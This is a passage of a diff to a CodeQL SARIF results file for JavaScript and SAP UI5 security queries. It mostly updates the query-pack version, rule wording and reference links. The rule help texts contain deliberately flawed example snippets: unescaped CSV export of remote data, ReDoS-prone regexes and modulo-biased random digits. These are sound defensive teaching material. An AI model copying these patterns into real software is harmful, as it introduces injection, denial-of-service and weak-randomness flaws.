let response = oEvent.getProperty(\"someProperty\").someField;\n let csvRow = \";\" + response + \";\";\n File.save(csvRow, \"someFile\", \"csv\", \"text/csv\", \"utf-8\");\n }\n });\n });\n```\n\n## References\n\n- OWASP: [CSV Injection](https://owasp.org/www-community/attacks/CSV_Injection).\n- Common Weakness Enumeration: [CWE-1236](https://cwe.mitre.org/data/definitions/1236.html).\n- SAP UI5 API Reference: [`sap.ui.export.Spreadsheet`](https://sapui5.hana.ondemand.com/#/entity/sap.ui.export.Spreadsheet).\n- SAP UI5 API Reference: [`sap.ui.core.util.File.save`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-1236" ], - "description" 
: "Saving data from an uncontrolled remote source using filesystem or local storage\n leads to disclosure of sensitive information or forgery of entry.", - "id" : "js/ui5-formula-injection", - "kind" : "path-problem", - "name" : "UI5 Formula Injection", - "precision" : "medium", - "problem.severity" : "error", - "security-severity" : "7.8" - } - } ], - "locations" : [ { - "uri" : "file:///home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/ui5/src/", - "description" : { - "text" : "The QL pack root directory." - } - }, { - "uri" : "file:///home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/ui5/src/qlpack.yml", - "description" : { - "text" : "The QL pack definition file." - } - } ] - }, { "name" : "codeql/javascript-queries", - "semanticVersion" : "0.8.1+8e890571ed7b21bc10698c5dbd032b9ed551d8f1", + "semanticVersion" : "0.8.16+b7f0b7afb5f0a65fb53b868ebe77b2e5d1b8d29a", "notifications" : [ { "id" : "js/diagnostics/extraction-errors", "name" : "js/diagnostics/extraction-errors", @@ -300,20 +67,20 @@ "id" : "js/diagnostics/successfully-extracted-files", "name" : "js/diagnostics/successfully-extracted-files", "shortDescription" : { - "text" : "Successfully extracted files" + "text" : "Extracted files" }, "fullDescription" : { - "text" : "Lists all files in the source code directory that were extracted without encountering an error in the file." + "text" : "Lists all files in the source code directory that were extracted." }, "defaultConfiguration" : { "enabled" : true }, "properties" : { "tags" : [ "successfully-extracted-files" ], - "description" : "Lists all files in the source code directory that were extracted without encountering an error in the file.", + "description" : "Lists all files in the source code directory that were extracted.", "id" : "js/diagnostics/successfully-extracted-files", "kind" : "diagnostic", - "name" : "Successfully extracted files" + "name" : "Extracted files" } } ], "rules" : [ { 
@@ -330,8 +97,8 @@ "level" : "warning" }, "help" : { - "text" : "# Polynomial regular expression used on uncontrolled data\nSome regular expressions take a long time to match certain input strings to the point where the time it takes to match a string of length *n* is proportional to *nk* or even *2n*. Such regular expressions can negatively affect performance, or even allow a malicious user to perform a Denial of Service (\"DoS\") attack by crafting an expensive input string for the regular expression to match.\n\nThe regular expression engines provided by many popular JavaScript platforms use backtracking non-deterministic finite automata to implement regular expression matching. While this approach is space-efficient and allows supporting advanced features like capture groups, it is not time-efficient in general. The worst-case time complexity of such an automaton can be polynomial or even exponential, meaning that for strings of a certain shape, increasing the input length by ten characters may make the automaton about 1000 times slower.\n\nTypically, a regular expression is affected by this problem if it contains a repetition of the form `r*` or `r+` where the sub-expression `r` is ambiguous in the sense that it can match some string in multiple ways. More information about the precise circumstances can be found in the references.\n\n\n## Recommendation\nModify the regular expression to remove the ambiguity, or ensure that the strings matched with the regular expression are short enough that the time-complexity does not matter.\n\n\n## Example\nConsider this use of a regular expression, which removes all leading and trailing whitespace in a string:\n\n```javascript\n\ntext.replace(/^\\s+|\\s+$/g, ''); // BAD\n```\nThe sub-expression `\"\\s+$\"` will match the whitespace characters in `text` from left to right, but it can start matching anywhere within a whitespace sequence. This is problematic for strings that do **not** end with a whitespace character. 
Such a string will force the regular expression engine to process each whitespace sequence once per whitespace character in the sequence.\n\nThis ultimately means that the time cost of trimming a string is quadratic in the length of the string. So a string like `\"a b\"` will take milliseconds to process, but a similar string with a million spaces instead of just one will take several minutes.\n\nAvoid this problem by rewriting the regular expression to not contain the ambiguity about when to start matching whitespace sequences. For instance, by using a negative look-behind (`/^\\s+|(? 1000) {\n throw new Error(\"Input too long\");\n}\n\n/^(\\+|-)?(\\d+|(\\d*\\.\\d*))?(E|e)?([-+])?(\\d+)?$/.test(str)\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* Wikipedia: [Time complexity](https://en.wikipedia.org/wiki/Time_complexity).\n* James Kirrage, Asiri Rathnayake, Hayo Thielecke: [Static Analysis for Regular Expression Denial-of-Service Attack](http://www.cs.bham.ac.uk/~hxt/research/reg-exp-sec.pdf).\n* Common Weakness Enumeration: [CWE-1333](https://cwe.mitre.org/data/definitions/1333.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n", - "markdown" : "# Polynomial regular expression used on uncontrolled data\nSome regular expressions take a long time to match certain input strings to the point where the time it takes to match a string of length *n* is proportional to *nk* or even *2n*. 
Such regular expressions can negatively affect performance, or even allow a malicious user to perform a Denial of Service (\"DoS\") attack by crafting an expensive input string for the regular expression to match.\n\nThe regular expression engines provided by many popular JavaScript platforms use backtracking non-deterministic finite automata to implement regular expression matching. While this approach is space-efficient and allows supporting advanced features like capture groups, it is not time-efficient in general. The worst-case time complexity of such an automaton can be polynomial or even exponential, meaning that for strings of a certain shape, increasing the input length by ten characters may make the automaton about 1000 times slower.\n\nTypically, a regular expression is affected by this problem if it contains a repetition of the form `r*` or `r+` where the sub-expression `r` is ambiguous in the sense that it can match some string in multiple ways. More information about the precise circumstances can be found in the references.\n\n\n## Recommendation\nModify the regular expression to remove the ambiguity, or ensure that the strings matched with the regular expression are short enough that the time-complexity does not matter.\n\n\n## Example\nConsider this use of a regular expression, which removes all leading and trailing whitespace in a string:\n\n```javascript\n\ntext.replace(/^\\s+|\\s+$/g, ''); // BAD\n```\nThe sub-expression `\"\\s+$\"` will match the whitespace characters in `text` from left to right, but it can start matching anywhere within a whitespace sequence. This is problematic for strings that do **not** end with a whitespace character. Such a string will force the regular expression engine to process each whitespace sequence once per whitespace character in the sequence.\n\nThis ultimately means that the time cost of trimming a string is quadratic in the length of the string. 
So a string like `\"a b\"` will take milliseconds to process, but a similar string with a million spaces instead of just one will take several minutes.\n\nAvoid this problem by rewriting the regular expression to not contain the ambiguity about when to start matching whitespace sequences. For instance, by using a negative look-behind (`/^\\s+|(? 1000) {\n throw new Error(\"Input too long\");\n}\n\n/^(\\+|-)?(\\d+|(\\d*\\.\\d*))?(E|e)?([-+])?(\\d+)?$/.test(str)\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* Wikipedia: [Time complexity](https://en.wikipedia.org/wiki/Time_complexity).\n* James Kirrage, Asiri Rathnayake, Hayo Thielecke: [Static Analysis for Regular Expression Denial-of-Service Attack](http://www.cs.bham.ac.uk/~hxt/research/reg-exp-sec.pdf).\n* Common Weakness Enumeration: [CWE-1333](https://cwe.mitre.org/data/definitions/1333.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n" + "text" : "# Polynomial regular expression used on uncontrolled data\nSome regular expressions take a long time to match certain input strings to the point where the time it takes to match a string of length *n* is proportional to *nk* or even *2n*. Such regular expressions can negatively affect performance, or even allow a malicious user to perform a Denial of Service (\"DoS\") attack by crafting an expensive input string for the regular expression to match.\n\nThe regular expression engines provided by many popular JavaScript platforms use backtracking non-deterministic finite automata to implement regular expression matching. While this approach is space-efficient and allows supporting advanced features like capture groups, it is not time-efficient in general. 
The worst-case time complexity of such an automaton can be polynomial or even exponential, meaning that for strings of a certain shape, increasing the input length by ten characters may make the automaton about 1000 times slower.\n\nTypically, a regular expression is affected by this problem if it contains a repetition of the form `r*` or `r+` where the sub-expression `r` is ambiguous in the sense that it can match some string in multiple ways. More information about the precise circumstances can be found in the references.\n\n\n## Recommendation\nModify the regular expression to remove the ambiguity, or ensure that the strings matched with the regular expression are short enough that the time-complexity does not matter.\n\n\n## Example\nConsider this use of a regular expression, which removes all leading and trailing whitespace in a string:\n\n```javascript\n\ntext.replace(/^\\s+|\\s+$/g, ''); // BAD\n```\nThe sub-expression `\"\\s+$\"` will match the whitespace characters in `text` from left to right, but it can start matching anywhere within a whitespace sequence. This is problematic for strings that do **not** end with a whitespace character. Such a string will force the regular expression engine to process each whitespace sequence once per whitespace character in the sequence.\n\nThis ultimately means that the time cost of trimming a string is quadratic in the length of the string. So a string like `\"a b\"` will take milliseconds to process, but a similar string with a million spaces instead of just one will take several minutes.\n\nAvoid this problem by rewriting the regular expression to not contain the ambiguity about when to start matching whitespace sequences. For instance, by using a negative look-behind (`/^\\s+|(? 
1000) {\n throw new Error(\"Input too long\");\n}\n\n/^(\\+|-)?(\\d+|(\\d*\\.\\d*))?(E|e)?([-+])?(\\d+)?$/.test(str)\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* Wikipedia: [Time complexity](https://en.wikipedia.org/wiki/Time_complexity).\n* James Kirrage, Asiri Rathnayake, Hayo Thielecke: [Static Analysis for Regular Expression Denial-of-Service Attack](https://arxiv.org/abs/1301.0849).\n* Common Weakness Enumeration: [CWE-1333](https://cwe.mitre.org/data/definitions/1333.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n", + "markdown" : "# Polynomial regular expression used on uncontrolled data\nSome regular expressions take a long time to match certain input strings to the point where the time it takes to match a string of length *n* is proportional to *nk* or even *2n*. Such regular expressions can negatively affect performance, or even allow a malicious user to perform a Denial of Service (\"DoS\") attack by crafting an expensive input string for the regular expression to match.\n\nThe regular expression engines provided by many popular JavaScript platforms use backtracking non-deterministic finite automata to implement regular expression matching. While this approach is space-efficient and allows supporting advanced features like capture groups, it is not time-efficient in general. 
The worst-case time complexity of such an automaton can be polynomial or even exponential, meaning that for strings of a certain shape, increasing the input length by ten characters may make the automaton about 1000 times slower.\n\nTypically, a regular expression is affected by this problem if it contains a repetition of the form `r*` or `r+` where the sub-expression `r` is ambiguous in the sense that it can match some string in multiple ways. More information about the precise circumstances can be found in the references.\n\n\n## Recommendation\nModify the regular expression to remove the ambiguity, or ensure that the strings matched with the regular expression are short enough that the time-complexity does not matter.\n\n\n## Example\nConsider this use of a regular expression, which removes all leading and trailing whitespace in a string:\n\n```javascript\n\ntext.replace(/^\\s+|\\s+$/g, ''); // BAD\n```\nThe sub-expression `\"\\s+$\"` will match the whitespace characters in `text` from left to right, but it can start matching anywhere within a whitespace sequence. This is problematic for strings that do **not** end with a whitespace character. Such a string will force the regular expression engine to process each whitespace sequence once per whitespace character in the sequence.\n\nThis ultimately means that the time cost of trimming a string is quadratic in the length of the string. So a string like `\"a b\"` will take milliseconds to process, but a similar string with a million spaces instead of just one will take several minutes.\n\nAvoid this problem by rewriting the regular expression to not contain the ambiguity about when to start matching whitespace sequences. For instance, by using a negative look-behind (`/^\\s+|(? 
1000) {\n throw new Error(\"Input too long\");\n}\n\n/^(\\+|-)?(\\d+|(\\d*\\.\\d*))?(E|e)?([-+])?(\\d+)?$/.test(str)\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* Wikipedia: [Time complexity](https://en.wikipedia.org/wiki/Time_complexity).\n* James Kirrage, Asiri Rathnayake, Hayo Thielecke: [Static Analysis for Regular Expression Denial-of-Service Attack](https://arxiv.org/abs/1301.0849).\n* Common Weakness Enumeration: [CWE-1333](https://cwe.mitre.org/data/definitions/1333.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n" }, "properties" : { "tags" : [ "security", "external/cwe/cwe-1333", "external/cwe/cwe-730", "external/cwe/cwe-400" ], 
@@ -357,8 +124,8 @@ "level" : "error" }, "help" : { - "text" : "# Inefficient regular expression\nSome regular expressions take a long time to match certain input strings to the point where the time it takes to match a string of length *n* is proportional to *nk* or even *2n*. Such regular expressions can negatively affect performance, or even allow a malicious user to perform a Denial of Service (\"DoS\") attack by crafting an expensive input string for the regular expression to match.\n\nThe regular expression engines provided by many popular JavaScript platforms use backtracking non-deterministic finite automata to implement regular expression matching. While this approach is space-efficient and allows supporting advanced features like capture groups, it is not time-efficient in general. The worst-case time complexity of such an automaton can be polynomial or even exponential, meaning that for strings of a certain shape, increasing the input length by ten characters may make the automaton about 1000 times slower.\n\nTypically, a regular expression is affected by this problem if it contains a repetition of the form `r*` or `r+` where the sub-expression `r` is ambiguous in the sense that it can match some string in multiple ways. More information about the precise circumstances can be found in the references.\n\n\n## Recommendation\nModify the regular expression to remove the ambiguity, or ensure that the strings matched with the regular expression are short enough that the time-complexity does not matter.\n\n\n## Example\nConsider this regular expression:\n\n```javascript\n\n/^_(__|.)+_$/\n```\nIts sub-expression `\"(__|.)+?\"` can match the string `\"__\"` either by the first alternative `\"__\"` to the left of the `\"|\"` operator, or by two repetitions of the second alternative `\".\"` to the right. 
Thus, a string consisting of an odd number of underscores followed by some other character will cause the regular expression engine to run for an exponential amount of time before rejecting the input.\n\nThis problem can be avoided by rewriting the regular expression to remove the ambiguity between the two branches of the alternative inside the repetition:\n\n```javascript\n\n/^_(__|[^_])+_$/\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* Wikipedia: [Time complexity](https://en.wikipedia.org/wiki/Time_complexity).\n* James Kirrage, Asiri Rathnayake, Hayo Thielecke: [Static Analysis for Regular Expression Denial-of-Service Attack](http://www.cs.bham.ac.uk/~hxt/research/reg-exp-sec.pdf).\n* Common Weakness Enumeration: [CWE-1333](https://cwe.mitre.org/data/definitions/1333.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n", - "markdown" : "# Inefficient regular expression\nSome regular expressions take a long time to match certain input strings to the point where the time it takes to match a string of length *n* is proportional to *nk* or even *2n*. Such regular expressions can negatively affect performance, or even allow a malicious user to perform a Denial of Service (\"DoS\") attack by crafting an expensive input string for the regular expression to match.\n\nThe regular expression engines provided by many popular JavaScript platforms use backtracking non-deterministic finite automata to implement regular expression matching. While this approach is space-efficient and allows supporting advanced features like capture groups, it is not time-efficient in general. 
The worst-case time complexity of such an automaton can be polynomial or even exponential, meaning that for strings of a certain shape, increasing the input length by ten characters may make the automaton about 1000 times slower.\n\nTypically, a regular expression is affected by this problem if it contains a repetition of the form `r*` or `r+` where the sub-expression `r` is ambiguous in the sense that it can match some string in multiple ways. More information about the precise circumstances can be found in the references.\n\n\n## Recommendation\nModify the regular expression to remove the ambiguity, or ensure that the strings matched with the regular expression are short enough that the time-complexity does not matter.\n\n\n## Example\nConsider this regular expression:\n\n```javascript\n\n/^_(__|.)+_$/\n```\nIts sub-expression `\"(__|.)+?\"` can match the string `\"__\"` either by the first alternative `\"__\"` to the left of the `\"|\"` operator, or by two repetitions of the second alternative `\".\"` to the right. 
Thus, a string consisting of an odd number of underscores followed by some other character will cause the regular expression engine to run for an exponential amount of time before rejecting the input.\n\nThis problem can be avoided by rewriting the regular expression to remove the ambiguity between the two branches of the alternative inside the repetition:\n\n```javascript\n\n/^_(__|[^_])+_$/\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* Wikipedia: [Time complexity](https://en.wikipedia.org/wiki/Time_complexity).\n* James Kirrage, Asiri Rathnayake, Hayo Thielecke: [Static Analysis for Regular Expression Denial-of-Service Attack](http://www.cs.bham.ac.uk/~hxt/research/reg-exp-sec.pdf).\n* Common Weakness Enumeration: [CWE-1333](https://cwe.mitre.org/data/definitions/1333.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n" + "text" : "# Inefficient regular expression\nSome regular expressions take a long time to match certain input strings to the point where the time it takes to match a string of length *n* is proportional to *nk* or even *2n*. Such regular expressions can negatively affect performance, or even allow a malicious user to perform a Denial of Service (\"DoS\") attack by crafting an expensive input string for the regular expression to match.\n\nThe regular expression engines provided by many popular JavaScript platforms use backtracking non-deterministic finite automata to implement regular expression matching. While this approach is space-efficient and allows supporting advanced features like capture groups, it is not time-efficient in general. 
The worst-case time complexity of such an automaton can be polynomial or even exponential, meaning that for strings of a certain shape, increasing the input length by ten characters may make the automaton about 1000 times slower.\n\nTypically, a regular expression is affected by this problem if it contains a repetition of the form `r*` or `r+` where the sub-expression `r` is ambiguous in the sense that it can match some string in multiple ways. More information about the precise circumstances can be found in the references.\n\n\n## Recommendation\nModify the regular expression to remove the ambiguity, or ensure that the strings matched with the regular expression are short enough that the time-complexity does not matter.\n\n\n## Example\nConsider this regular expression:\n\n```javascript\n\n/^_(__|.)+_$/\n```\nIts sub-expression `\"(__|.)+?\"` can match the string `\"__\"` either by the first alternative `\"__\"` to the left of the `\"|\"` operator, or by two repetitions of the second alternative `\".\"` to the right. 
Thus, a string consisting of an odd number of underscores followed by some other character will cause the regular expression engine to run for an exponential amount of time before rejecting the input.\n\nThis problem can be avoided by rewriting the regular expression to remove the ambiguity between the two branches of the alternative inside the repetition:\n\n```javascript\n\n/^_(__|[^_])+_$/\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* Wikipedia: [Time complexity](https://en.wikipedia.org/wiki/Time_complexity).\n* James Kirrage, Asiri Rathnayake, Hayo Thielecke: [Static Analysis for Regular Expression Denial-of-Service Attack](https://arxiv.org/abs/1301.0849).\n* Common Weakness Enumeration: [CWE-1333](https://cwe.mitre.org/data/definitions/1333.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n", + "markdown" : "# Inefficient regular expression\nSome regular expressions take a long time to match certain input strings to the point where the time it takes to match a string of length *n* is proportional to *nk* or even *2n*. Such regular expressions can negatively affect performance, or even allow a malicious user to perform a Denial of Service (\"DoS\") attack by crafting an expensive input string for the regular expression to match.\n\nThe regular expression engines provided by many popular JavaScript platforms use backtracking non-deterministic finite automata to implement regular expression matching. While this approach is space-efficient and allows supporting advanced features like capture groups, it is not time-efficient in general. 
The worst-case time complexity of such an automaton can be polynomial or even exponential, meaning that for strings of a certain shape, increasing the input length by ten characters may make the automaton about 1000 times slower.\n\nTypically, a regular expression is affected by this problem if it contains a repetition of the form `r*` or `r+` where the sub-expression `r` is ambiguous in the sense that it can match some string in multiple ways. More information about the precise circumstances can be found in the references.\n\n\n## Recommendation\nModify the regular expression to remove the ambiguity, or ensure that the strings matched with the regular expression are short enough that the time-complexity does not matter.\n\n\n## Example\nConsider this regular expression:\n\n```javascript\n\n/^_(__|.)+_$/\n```\nIts sub-expression `\"(__|.)+?\"` can match the string `\"__\"` either by the first alternative `\"__\"` to the left of the `\"|\"` operator, or by two repetitions of the second alternative `\".\"` to the right. 
Thus, a string consisting of an odd number of underscores followed by some other character will cause the regular expression engine to run for an exponential amount of time before rejecting the input.\n\nThis problem can be avoided by rewriting the regular expression to remove the ambiguity between the two branches of the alternative inside the repetition:\n\n```javascript\n\n/^_(__|[^_])+_$/\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* Wikipedia: [Time complexity](https://en.wikipedia.org/wiki/Time_complexity).\n* James Kirrage, Asiri Rathnayake, Hayo Thielecke: [Static Analysis for Regular Expression Denial-of-Service Attack](https://arxiv.org/abs/1301.0849).\n* Common Weakness Enumeration: [CWE-1333](https://cwe.mitre.org/data/definitions/1333.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n" }, "properties" : { "tags" : [ "security", "external/cwe/cwe-1333", "external/cwe/cwe-730", "external/cwe/cwe-400" ], @@ -1049,7 +816,7 @@ "id" : "js/biased-cryptographic-random", "name" : "js/biased-cryptographic-random", "shortDescription" : { - "text" : "Creating biased random numbers from a cryptographically secure source." + "text" : "Creating biased random numbers from a cryptographically secure source" }, "fullDescription" : { "text" : "Some mathematical operations on random numbers can cause bias in the results and compromise security." 
@@ -1059,15 +826,15 @@ "level" : "warning" }, "help" : { - "text" : "# Creating biased random numbers from a cryptographically secure source.\nGenerating secure random numbers can be an important part of creating a secure software system. This can be done using APIs that create cryptographically secure random numbers.\n\nHowever, using some mathematical operations on these cryptographically secure random numbers can create biased results, where some outcomes are more likely than others. Such biased results can make it easier for an attacker to guess the random numbers, and thereby break the security of the software system.\n\n\n## Recommendation\nBe very careful not to introduce bias when performing mathematical operations on cryptographically secure random numbers.\n\nIf possible, avoid performing mathematical operations on cryptographically secure random numbers at all, and use a preexisting library instead.\n\n\n## Example\nThe example below uses the modulo operator to create an array of 10 random digits using random bytes as the source for randomness.\n\n\n```javascript\nconst crypto = require('crypto');\n\nconst digits = [];\nfor (let i = 0; i < 10; i++) {\n digits.push(crypto.randomBytes(1)[0] % 10); // NOT OK\n}\n```\nThe random byte is a uniformly random value between 0 and 255, and thus the result from using the modulo operator is slightly more likely to be between 0 and 5 than between 6 and 9.\n\nThe issue has been fixed in the code below by using a library that correctly generates cryptographically secure random values.\n\n\n```javascript\nconst cryptoRandomString = require('crypto-random-string');\n\nconst digits = cryptoRandomString({length: 10, type: 'numeric'});\n```\nAlternatively, the issue can be fixed by fixing the math in the original code. In the code below the random byte is discarded if the value is greater than or equal to 250. 
Thus the modulo operator is used on a uniformly random number between 0 and 249, which results in a uniformly random digit between 0 and 9.\n\n\n```javascript\nconst crypto = require('crypto');\n\nconst digits = [];\nwhile (digits.length < 10) {\n const byte = crypto.randomBytes(1)[0];\n if (byte >= 250) {\n continue;\n }\n digits.push(byte % 10); // OK\n}\n```\n\n## References\n* Stack Overflow: [Understanding “randomness”](https://stackoverflow.com/questions/3956478/understanding-randomness).\n* OWASP: [Insecure Randomness](https://owasp.org/www-community/vulnerabilities/Insecure_Randomness).\n* OWASP: [Rule - Use strong approved cryptographic algorithms](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#rule---use-strong-approved-authenticated-encryption).\n* Common Weakness Enumeration: [CWE-327](https://cwe.mitre.org/data/definitions/327.html).\n", - "markdown" : "# Creating biased random numbers from a cryptographically secure source.\nGenerating secure random numbers can be an important part of creating a secure software system. This can be done using APIs that create cryptographically secure random numbers.\n\nHowever, using some mathematical operations on these cryptographically secure random numbers can create biased results, where some outcomes are more likely than others. 
Such biased results can make it easier for an attacker to guess the random numbers, and thereby break the security of the software system.\n\n\n## Recommendation\nBe very careful not to introduce bias when performing mathematical operations on cryptographically secure random numbers.\n\nIf possible, avoid performing mathematical operations on cryptographically secure random numbers at all, and use a preexisting library instead.\n\n\n## Example\nThe example below uses the modulo operator to create an array of 10 random digits using random bytes as the source for randomness.\n\n\n```javascript\nconst crypto = require('crypto');\n\nconst digits = [];\nfor (let i = 0; i < 10; i++) {\n digits.push(crypto.randomBytes(1)[0] % 10); // NOT OK\n}\n```\nThe random byte is a uniformly random value between 0 and 255, and thus the result from using the modulo operator is slightly more likely to be between 0 and 5 than between 6 and 9.\n\nThe issue has been fixed in the code below by using a library that correctly generates cryptographically secure random values.\n\n\n```javascript\nconst cryptoRandomString = require('crypto-random-string');\n\nconst digits = cryptoRandomString({length: 10, type: 'numeric'});\n```\nAlternatively, the issue can be fixed by fixing the math in the original code. In the code below the random byte is discarded if the value is greater than or equal to 250. 
Thus the modulo operator is used on a uniformly random number between 0 and 249, which results in a uniformly random digit between 0 and 9.\n\n\n```javascript\nconst crypto = require('crypto');\n\nconst digits = [];\nwhile (digits.length < 10) {\n const byte = crypto.randomBytes(1)[0];\n if (byte >= 250) {\n continue;\n }\n digits.push(byte % 10); // OK\n}\n```\n\n## References\n* Stack Overflow: [Understanding “randomness”](https://stackoverflow.com/questions/3956478/understanding-randomness).\n* OWASP: [Insecure Randomness](https://owasp.org/www-community/vulnerabilities/Insecure_Randomness).\n* OWASP: [Rule - Use strong approved cryptographic algorithms](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#rule---use-strong-approved-authenticated-encryption).\n* Common Weakness Enumeration: [CWE-327](https://cwe.mitre.org/data/definitions/327.html).\n" + "text" : "# Creating biased random numbers from a cryptographically secure source\nGenerating secure random numbers can be an important part of creating a secure software system. This can be done using APIs that create cryptographically secure random numbers.\n\nHowever, using some mathematical operations on these cryptographically secure random numbers can create biased results, where some outcomes are more likely than others. 
Such biased results can make it easier for an attacker to guess the random numbers, and thereby break the security of the software system.\n\n\n## Recommendation\nBe very careful not to introduce bias when performing mathematical operations on cryptographically secure random numbers.\n\nIf possible, avoid performing mathematical operations on cryptographically secure random numbers at all, and use a preexisting library instead.\n\n\n## Example\nThe example below uses the modulo operator to create an array of 10 random digits using random bytes as the source for randomness.\n\n\n```javascript\nconst crypto = require('crypto');\n\nconst digits = [];\nfor (let i = 0; i < 10; i++) {\n digits.push(crypto.randomBytes(1)[0] % 10); // NOT OK\n}\n```\nThe random byte is a uniformly random value between 0 and 255, and thus the result from using the modulo operator is slightly more likely to be between 0 and 5 than between 6 and 9.\n\nThe issue has been fixed in the code below by using a library that correctly generates cryptographically secure random values.\n\n\n```javascript\nconst cryptoRandomString = require('crypto-random-string');\n\nconst digits = cryptoRandomString({length: 10, type: 'numeric'});\n```\nAlternatively, the issue can be fixed by fixing the math in the original code. In the code below the random byte is discarded if the value is greater than or equal to 250. 
Thus the modulo operator is used on a uniformly random number between 0 and 249, which results in a uniformly random digit between 0 and 9.\n\n\n```javascript\nconst crypto = require('crypto');\n\nconst digits = [];\nwhile (digits.length < 10) {\n const byte = crypto.randomBytes(1)[0];\n if (byte >= 250) {\n continue;\n }\n digits.push(byte % 10); // OK\n}\n```\n\n## References\n* Stack Overflow: [Understanding “randomness”](https://stackoverflow.com/questions/3956478/understanding-randomness).\n* OWASP: [Insecure Randomness](https://owasp.org/www-community/vulnerabilities/Insecure_Randomness).\n* OWASP: [Rule - Use strong approved cryptographic algorithms](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#rule---use-strong-approved-authenticated-encryption).\n* Common Weakness Enumeration: [CWE-327](https://cwe.mitre.org/data/definitions/327.html).\n", + "markdown" : "# Creating biased random numbers from a cryptographically secure source\nGenerating secure random numbers can be an important part of creating a secure software system. This can be done using APIs that create cryptographically secure random numbers.\n\nHowever, using some mathematical operations on these cryptographically secure random numbers can create biased results, where some outcomes are more likely than others. 
Such biased results can make it easier for an attacker to guess the random numbers, and thereby break the security of the software system.\n\n\n## Recommendation\nBe very careful not to introduce bias when performing mathematical operations on cryptographically secure random numbers.\n\nIf possible, avoid performing mathematical operations on cryptographically secure random numbers at all, and use a preexisting library instead.\n\n\n## Example\nThe example below uses the modulo operator to create an array of 10 random digits using random bytes as the source for randomness.\n\n\n```javascript\nconst crypto = require('crypto');\n\nconst digits = [];\nfor (let i = 0; i < 10; i++) {\n digits.push(crypto.randomBytes(1)[0] % 10); // NOT OK\n}\n```\nThe random byte is a uniformly random value between 0 and 255, and thus the result from using the modulo operator is slightly more likely to be between 0 and 5 than between 6 and 9.\n\nThe issue has been fixed in the code below by using a library that correctly generates cryptographically secure random values.\n\n\n```javascript\nconst cryptoRandomString = require('crypto-random-string');\n\nconst digits = cryptoRandomString({length: 10, type: 'numeric'});\n```\nAlternatively, the issue can be fixed by fixing the math in the original code. In the code below the random byte is discarded if the value is greater than or equal to 250. 
